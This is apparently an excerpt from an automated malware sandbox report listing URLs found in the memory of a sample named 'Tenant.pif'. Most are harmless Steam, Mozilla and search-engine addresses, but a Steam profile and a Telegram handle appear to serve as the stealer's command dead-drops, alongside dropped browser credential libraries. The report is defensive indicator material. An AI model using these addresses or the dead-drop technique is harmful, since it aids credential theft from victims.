                    Source: KEBKJD.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: KEBKJD.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: KEBKJD.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=iyaDfxhc
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cii-
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=od0wu57c9_w6&l=e
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                    Source: KEBKJD.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: KEBKJD.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: KEBKJD.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: CBFCBK.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199761128941
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.0000000001394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/badges
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/inventory/
                    Source: Tenant.pif, 0000000B.00000002.4072894428.0000000001394000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997611289410
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941b
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4073444723.0000000001510000.00000004.00000800.00020000.00000000.sdmp, 76561199761128941[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: HJKECA.11.drString found in binary or memory: https://support.mozilla.org
                    Source: HJKECA.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: HJKECA.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/iyigunl
                    Source: Tenant.pif, 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.0000000001764000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000003.3254796660.00000000015AE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074431990.000000000178F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/iyigunlhellosqlr.dllsqlite3.dllIn
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: Tenant.pif, 0000000B.00000002.4073444723.000000000152E000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4074033487.00000000015AD000.00000004.00000800.00020000.00000000.sdmp, CBFCBK.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                    Source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: KEBKJD.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Neo.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: file.exe, 00000000.00000003.2009804495.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, Tenant.pif.2.dr, Neo.0.drString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: KEBKJD.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.0000000000278000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.0000000000186000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/BFIDGCGDHJ
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: Tenant.pif, 0000000B.00000003.3794687472.0000000012A3A000.00000004.00000800.00020000.00000000.sdmp, HJKECA.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: HJKECA.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Tenant.pif, 0000000B.00000003.3794687472.0000000012A3A000.00000004.00000800.00020000.00000000.sdmp, HJKECA.11.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077551240.000000000C1BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: Tenant.pif, 0000000B.00000002.4068394882.000000000027E000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: Tenant.pif, 0000000B.00000003.3794687472.0000000012A3A000.00000004.00000800.00020000.00000000.sdmp, HJKECA.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
